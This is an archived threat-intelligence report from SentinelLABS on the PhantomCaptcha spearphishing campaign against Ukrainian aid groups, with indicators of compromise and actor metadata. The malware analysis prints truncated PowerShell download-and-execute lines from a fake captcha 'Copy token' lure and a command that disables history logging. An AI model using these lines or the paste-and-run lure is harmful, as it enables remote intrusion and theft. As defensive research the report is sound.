{ "id": "3b1c53cd-0c15-4891-902f-92b197782980", "created_at": "2026-04-06T00:08:50.653864Z", "updated_at": "2026-04-10T03:34:43.794638Z", "deleted_at": null, "sha1_hash": "c1c565ff69ab040ff11e458bd7db382739194105", "title": "PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5133193, "plain_text": "PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine\r\nin Single-Day Spearphishing Operation\r\nBy Tom Hegel\r\nPublished: 2025-10-22 · Archived: 2026-04-05 21:32:11 UTC\r\nExecutive Summary\r\nSentinelLABS together with Digital Security Lab of Ukraine has uncovered a coordinated spearphishing\r\ncampaign targeting individual members of the International Red Cross, Norwegian Refugee Council,\r\nUNICEF, and other NGOs involved in war relief efforts and Ukrainian regional government\r\nadministration.\r\nThreat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs,\r\nluring victims into executing malware via a ‘ClickFix’-style fake Cloudflare captcha page.\r\nThe final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary\r\nremote command execution, data exfiltration, and potential deployment of additional malware.\r\nDespite six months of preparation, the attackers’ infrastructure was only active for a single day, indicating\r\nsophisticated planning and strong commitment to operational security.\r\nAn additional infrastructure pivot revealed a mobile attack vector with fake applications aimed at\r\ncollecting geolocation, contacts, media files and other data from compromised Android devices.\r\nBackground\r\nFollowing intelligence shared by research partner Digital Security Lab of Ukraine, SentinelLABS conducted an\r\ninvestigation into a coordinated spearphishing campaign launched on October 8th, 2025, targeting organizations\r\ncritical to Ukraine’s war relief efforts.\r\nThe campaign was initiated through emails that impersonated the Ukrainian President’s Office and contained a\r\nweaponized PDF attachment (SHA-256:\r\ne8d0943042e34a37ae8d79aeb4f9a2fa07b4a37955af2b0cc0e232b79c2e72f3 ) embedded with a malicious link.\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 1 of 13\n\nPDF document page 1/8\r\nTargeted organizations included the International Committee of the Red Cross (ICRC), United Nations Children’s\r\nFund (UNICEF) Ukraine office, Norwegian Refugee Council, Council of Europe’s Register of Damage for\r\nUkraine, and Ukrainian government administrations in the Donetsk, Dnipropetrovsk, Poltava, and Mikolaevsk\r\nregions.\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 2 of 13\n\nThe weaponized PDF was an 8-page document that appeared to be a legitimate governmental communique.\r\nVirusTotal submissions on October 8th showed the malicious file uploaded from multiple locations including\r\nUkraine, India, Italy, and Slovakia, suggesting widespread targeting and potential victim interaction with the\r\ncampaign.\r\nPhantomCaptcha Attack Chain\r\nThe PhantomCaptcha campaign employed a sophisticated multi-stage attack chain designed to exploit user trust\r\nand bypass traditional security controls.\r\nOpening the weaponized PDF and clicking on the embedded link directed the victim to zoomconference[.]app , a\r\ndomain masquerading as a legitimate Zoom site but in reality hosting a VPS server located in Finland and owned\r\nby Russian provider KVMKA.\r\nOur analysis showed that zoomconference[.]app , hosted on IP 193.233.23[.]81 , stopped resolving on the\r\nsame day the attack attempt took place, indicating a single day operation. However, we were able to retrieve the\r\nserver response from a record captured on VirusTotal. The server response showed that any visitors to the site\r\nencountered a convincing fake Cloudflare DDoS protection gateway.\r\nInitial view of a page from zoomconference[.]app\r\nAfter loading, the fake Cloudflare page attempts to establish a WebSocket connection to the attackers’ server,\r\npassing a randomly generated client identifier, clientId , produced by an embedded JavaScript function\r\ngenerateRandomId() . A JavaScript comment before the function suggests the client identifier should be 32\r\ncharacters long; however, the code utilizes only 2 characters for clientId .\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 3 of 13\n\nThe attack infrastructure supported two potential infection paths. If the WebSocket server responded with a\r\nmatching identifier, the victim’s browser would redirect to a legitimate, password-protected Zoom meeting. This\r\ninfection path likely enabled live social engineering calls with victims; however, activation of this path was not\r\nobserved during our investigation.\r\nThe primary infection vector relied on a variation of a social engineering technique that has been widely deployed\r\nby a variety of threat actors since mid-2024. Dubbed ClickFix or Paste and Run, it involves convincing the target\r\nto execute commands either deliberately or surreptitiously copied to the user’s clipboard. The PhantomCaptcha\r\nvariant of this technique works as follows.\r\nAfter the fake “automatic” verification process, victims are presented with a simulated reCaptcha challenge\r\ndisplaying an “I’m not a robot” checkbox.\r\nSimulated reCaptcha controls\r\nClicking the checkbox triggers a popup with instructions in Ukrainian, directing users to\r\n1. Click the “Copy token” button in the popup\r\n2. Press Windows + R to open the Run dialog\r\n3. Paste and execute the command\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 4 of 13\n\nCustom reCaptcha popup in Ukrainian with “Copy token” button\r\nThe button runs a function copyToken() which contains a PowerShell commandlet designed to run invisibly.\r\nfunction copyToken(){\r\n//--headless \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -\r\nlet code = `iex ((New-Object System.Net.WebClient).DownloadString(\\\\\"ht\\\\\"+\\\\\"tps://zoomconference.a\\\r\nnavigator.clipboard.writeText(\"conhost.exe --headless \\\"C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1\r\n}\r\nThe code downloads and executes the next stage PowerShell script from\r\nhxxps://zoomconference[.]app/cptch/${clientId} , where ${clientId} is the same ID as described above.\r\nThis social engineering technique is particularly effective because the malicious code is executed by the user\r\nthemselves, evading endpoint security controls that focus solely on detecting malicious files.\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 5 of 13\n\nInfection paths\r\nOur analysis suggests this attack chain has overlaps with recently-reported activity attributed to COLDRIVER, a\r\nRussian FSB-linked threat cluster, by several industry peers [1, 2, 3]. We continue to investigate whether this\r\nattribution can be confidently extended to the PhantomCaptcha campaign.\r\nMulti-Stage Payload Delivery\r\nAlthough the malware distribution server at zoomconference[.]app was not available at the time of analysis, we\r\nmanaged to discover additional infrastructure and payloads from malware repositories by querying for files from\r\nURLs ending with /cptch .\r\nOur analysis revealed that the PhantomCaptcha campaign aimed to deliver PowerShell malware in three stages.\r\nStage 1: Obfuscated Downloader\r\nThe initial payload (SHA-256: 3324550964ec376e74155665765b1492ae1e3bdeb35d57f18ad9aaca64d50a44 ) was a\r\nheavily obfuscated PowerShell script named cptch and exceeding 500KB in size. Despite its apparent\r\ncomplexity, the cptch script’s core functionality is simply to download and execute a second-stage payload from\r\nhxxps://bsnowcommunications[.]com/maintenance .\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 6 of 13\n\nThe cptch file is a heavily obfuscated PowerShell script\r\nThe entire inflated script can be reduced to a single line:\r\n\u0026 ([ScriptBlock]::Create( (New-Object System.Net.WebClient).DownloadString(\"hxxps://bsnowcommunicatio\r\nUsing massive obfuscation to obscure simple functionality is likely designed to evade signature-based detection\r\nand complicate analysis efforts.\r\nStage 2: Fingerprinting and Encrypted Comms\r\nThe second-stage payload (SHA-256: 4bc8cf031b2e521f2b9292ffd1aefc08b9c00dab119f9ec9f65219a0fbf0f566 )\r\nis named maintenance and performs system reconnaissance, collecting:\r\nComputer name\r\nDomain information\r\nUsername\r\nProcess ID\r\nSystem UUID (hardware identifier)\r\nThis data was XOR-encrypted with the hardcoded key b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l and sent to\r\nhxxps://bsnowcommunications[.]com/maintenance/\u003cdata\u003e via HTTP GET requests.\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 7 of 13\n\nPart of the maintenance script and the hardcoded XOR key used for encryption\r\nThe script also disabled PowerShell command history logging via Set-PSReadlineOption -HistorySaveStyle\r\nSaveNothing as a means of evading forensic analysis.\r\nThe server responded with an encrypted payload containing the third and final stage, which was decrypted and\r\nexecuted in memory.\r\nStage 3: WebSocket-Based Remote Access Trojan\r\nThe final payload (SHA-256: 19bcf7ca3df4e54034b57ca924c9d9d178f4b0b8c2071a350e310dd645cd2b23 ) is a\r\nlightweight PowerShell backdoor that connects (and repeatedly reconnects) to a remote WebSocket server at\r\nwss://bsnowcommunications[.]com:80 . It receives Base64-encoded JSON messages that contain one of:\r\nAfter execution, the script collects output, the current working directory, the machine HWID (UUID via WMI),\r\nPID, and an IDC identifier from the server message, converts that to JSON, and sends it back over the WebSocket.\r\nIt is designed to run in an infinite loop, with reconnect logic and basic error handling.\r\nThe WebSocket-based RAT is a remote command execution backdoor, effectively a remote shell that gives an\r\noperator arbitrary access to the host.\r\nInfrastructure Analysis\r\nPhantomCaptcha demonstrated a moderate level of operational security through its brief active window. The C2\r\ndomain zoomconference[.]app resolved to 193.233.23[.]81 , a VPS server hosted by Russian provider\r\nKVMKA. SentinelLABS’ analysis revealed the infrastructure was active for only about 24 hours on October 8,\r\n2025, with ports 443 and 80 closed by the time of our investigation.\r\nBy fingerprinting the cached server response, we were able to identify a further malicious IP address\r\n45.15.156[.]24 , which resolves from goodhillsenterprise[.]com and has previously been seen serving\r\nobfuscated PowerShell malware scripts [1, 2]. We assess, with medium confidence, that 45.15.156[.]24 is\r\ncurrently or has recently been under the control of the threat actors behind PhantomCaptcha.\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 8 of 13\n\nThe C2 domain bsnowcommunications[.]com is linked to IP 185.142.33[.]131 . Unlike the public-facing lure\r\ndomain, this backend C2 infrastructure remains active, indicating strong compartmentalization and the need to\r\nmaintain certain infrastructure for already-compromised systems.\r\nWe also found that on October 9, 2025, the day after the initial attack, a domain with the name\r\nzoomconference[.]click was registered, potentially indicating plans for continued operations.\r\nPhantomCaptcha 2025 Attack Timeline\r\nMarch – According to the earliest related event (registration of goodhillsenterprise[.]com ), the\r\nattackers started their operations on 2025-03-27.\r\nJuly – A number of malicious PowerShell scripts and other malware samples were developed and tested on\r\nVirusTotal in July 2025.\r\nSeptember – SSL certificates from Let’s Encrypt for the related domains were issued on Sep 15 and Sep\r\n25, 2025.\r\nOctober – Internal timestamps from the lure PDF document are dated back to Aug 2025, but were updated\r\non Oct 8, 2025. The email with malicious attachment was also sent out on Oct 8, 2025. On the same day,\r\nthe attack domain was shut down only to appear the following day (Oct 9, 2025) under a different top level\r\ndomain.\r\nPivot to Additional Campaign\r\nOne interesting pivot from our infrastructure analysis revealed a link to a wider campaign making use of adult-oriented social and entertainment lures, with potential links to Russia/Belarus source development.\r\nAs noted earlier, the PhantomCaptcha zoom-themed domains were hosted on 193.233.23[.]81 . During our\r\nanalysis, the same IP began hosting a new domain, princess-mens[.]click , which appeared similar in\r\nownership and configuration. Collected HTTPS response data from zoomconference[.]click also began\r\nincluding content identical to that found in the new domain, indicating a direct overlap in ownership of both\r\ndomains.\r\nDomain timeline, focused on October and later, on 193.233.23[.]81\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 9 of 13\n\nzoomconference[.]click HTTPS response data matching princess-mens[.]click\r\nThe princess-mens[.]click domain has been observed linked to an Android application called princess.apk ,\r\nhosted at https://princess-mens[.]click/princess.apk . The domain’s content and the APK are themed around\r\nan adult entertainment venue in Lviv, Ukraine, called Princess Men’s Club. Similar APKs can be found in other\r\nthemes as well, such as “Cloud Storage”.\r\nApp requesting device location\r\nThe application collects a variety of data to send to a hardcoded C2, which itself can be linked to additional\r\ninfrastructure and samples. The samples use the HTTPS protocol and communicate over port 5000 to various\r\nserver paths such as /check_update , /data , and /upload . For example:\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 10 of 13\n\nhttps:\r\nThe APK’s collectAndSendAllData() method is designed to gather a wide range of personal and device\r\ninformation. Based on the variable names in the code, the specific data being collected appears to be as follows.\r\nContacts data phonebook entries (names, numbers, emails).\r\nCall logs incoming, outgoing, and missed calls.\r\nInstalled apps list of all installed applications.\r\nSIM numbers/data SIM card information such as numbers, IMSI, or carrier details.\r\nDevice info hardware model, OS version, manufacturer, and possibly device ID.\r\nNetwork info connected network type (Wi-Fi, mobile, etc).\r\nWi-Fi SSID name of the currently connected Wi-Fi network.\r\nLocation data GPS or last known location of the device.\r\nPublic IP address external IP visible to the internet.\r\nGallery images photos or image metadata stored on the device.\r\nWhile these findings indicate a possible relation to the PhantomCaptcha campaign, we are currently tracking it as\r\na separate cluster of activity and encourage the research community to further pursue this lead for additional\r\ninsight. We provide indicators that may be fruitful to explore at the end of this post.\r\nSecurity Implications\r\nLegitimate services do not require pasting commands into Windows Run dialog (Win+R) or similar interfaces.\r\nHence, user awareness training on “Paste and Run” social engineering techniques can help prevent attacks using\r\nthis infection vector. Similarly, unexpected communications from government offices can be independently\r\nverified through known channels.\r\nFrom a technical perspective, PowerShell execution logging and monitoring provides visibility into commands\r\nusing hidden window styles, execution policy bypasses, or attempts to disable command history logging.\r\nAdditionally, network security teams can monitor for WebSocket connections to recently-registered or suspicious\r\ndomains, particularly those mimicking legitimate services.\r\nWe provide a comprehensive list of Indicators of Compromise below to support threat hunting and detection\r\nefforts.\r\nConclusion\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 11 of 13\n\nThe PhantomCaptcha campaign reflects a highly capable adversary, demonstrating extensive operational planning,\r\ncompartmentalized infrastructure, and deliberate exposure control. The six-month period between initial\r\ninfrastructure registration and attack execution, followed by the swift takedown of user-facing domains while\r\nmaintaining backend command-and-control, underscores an operator well-versed in both offensive tradecraft and\r\ndefensive detection evasion.\r\nThe targeting of organizations supporting Ukraine’s relief efforts also reveal an adversary seeking intelligence\r\nacross humanitarian operations, reconstruction planning, and international coordination efforts.\r\nSentinelLABS continues to monitor infrastructure associated with this threat actor and will provide updates as\r\nnew information becomes available.\r\nAcknowledgments\r\nWe would like to express our thanks to partners in the region, including Digital Security Lab of Ukraine for their\r\ninvaluable collaboration on this case.\r\nOrganizations that believe they may have been targeted by threat actors involved in this campaign are invited to\r\nreach out to the SentinelLABS team via ThreatTips@sentinelone.com.\r\nIndicators of Compromise\r\nPhantomCaptcha\r\nDomains\r\nbsnowcommunications[.]com\r\ngoodhillsenterprise[.]com\r\nlapas[.]live\r\nzoomconference[.]app\r\nzoomconference[.]click\r\nIP Addresses\r\n45.15.156[.]24\r\n185.142.33[.]131\r\n193.233.23[.]81\r\nHashes (SHA-256)\r\n19bcf7ca3df4e54034b57ca924c9d9d178f4b0b8c2071a350e310dd645cd2b23\r\n21bdf1638a2f3ec31544222b96ab80ba793e2bcbaa747dbf9332fb4b021a2bcd\r\n3324550964ec376e74155665765b1492ae1e3bdeb35d57f18ad9aaca64d50a44\r\n4bc8cf031b2e521f2b9292ffd1aefc08b9c00dab119f9ec9f65219a0fbf0f566\r\n5f42130139a09df50d52a03f448d92cbf40d7eae74840825f7b0e377ee5c8839\r\n6f9a7ab475b4c1ea871f7b16338a531703af0443f987c748fa5fff075b8c5f91\r\n8ef05f4d7d4d96ca6f758f2b5093b7d378e2e986667967fe36dbdaf52f338587\r\ne8d0943042e34a37ae8d79aeb4f9a2fa07b4a37955af2b0cc0e232b79c2e72f3\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 12 of 13\n\nAdditional Indicators | Android Malware\r\nDomains\r\nprincess-mens[.]click\r\nprincess-mens-club[.]com\r\nIP Addresses\r\n91.149.253[.]99\r\n91.149.253[.]134\r\n167.17.188[.]244\r\nHashes (SHA-256)\r\n07d9deaace25d90fc91b31849dfc12b2fc3ac5ca90e317cfa165fe1d3553eead (Cloud Storage)\r\n55677db95eb5ddcca47394d188610029f06101ee7d1d8e63d9444c9c5cb04ae1 (princess.apk)\r\nb02d8f8cf57abdc92b3af2545f1e46f1813f192f4a200a3de102fd38cf048517 (princess.apk)\r\nbcb9e99021f88b9720a667d737a3ddd7d5b9f963ac3cae6d26e74701e406dcdc (princess.apk)\r\nSource: https://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nhttps://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/" ], "report_names": [ "phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation" ], "threat_actors": [ { "id": "79bd28a6-dc10-419b-bee7-25511ae9d3d4", "created_at": "2023-01-06T13:46:38.581534Z", "updated_at": "2026-04-10T02:00:03.029872Z", "deleted_at": null, "main_name": "Callisto", "aliases": [ "BlueCharlie", "Star Blizzard", "TAG-53", "Blue Callisto", "TA446", "IRON FRONTIER", "UNC4057", "COLDRIVER", "SEABORGIUM", "GOSSAMER BEAR" ], "source_name": "MISPGALAXY:Callisto", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3aedca2f-6f6c-4470-af26-a46097d3eab5", "created_at": "2024-11-01T02:00:52.689773Z", "updated_at": "2026-04-10T02:00:05.396502Z", "deleted_at": null, "main_name": "Star Blizzard", "aliases": [ "Star Blizzard", "SEABORGIUM", "Callisto Group", "TA446", "COLDRIVER" ], "source_name": "MITRE:Star Blizzard", "tools": [ "Spica" ], "source_id": "MITRE", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "3a057a97-db21-4261-804b-4b071a03c124", "created_at": "2024-06-04T02:03:07.953282Z", "updated_at": "2026-04-10T02:00:03.813595Z", "deleted_at": null, "main_name": "IRON FRONTIER", "aliases": [ "Blue Callisto ", "BlueCharlie ", "CALISTO ", "COLDRIVER ", "Callisto Group ", "GOSSAMER BEAR ", "SEABORGIUM ", "Star Blizzard ", "TA446 " ], "source_name": "Secureworks:IRON FRONTIER", "tools": [ "Evilginx2", "Galileo RCS", "SPICA" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434130, "ts_updated_at": 1775792083, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c1c565ff69ab040ff11e458bd7db382739194105.pdf", "text": "https://archive.orkl.eu/c1c565ff69ab040ff11e458bd7db382739194105.txt", "img": "https://archive.orkl.eu/c1c565ff69ab040ff11e458bd7db382739194105.jpg" } }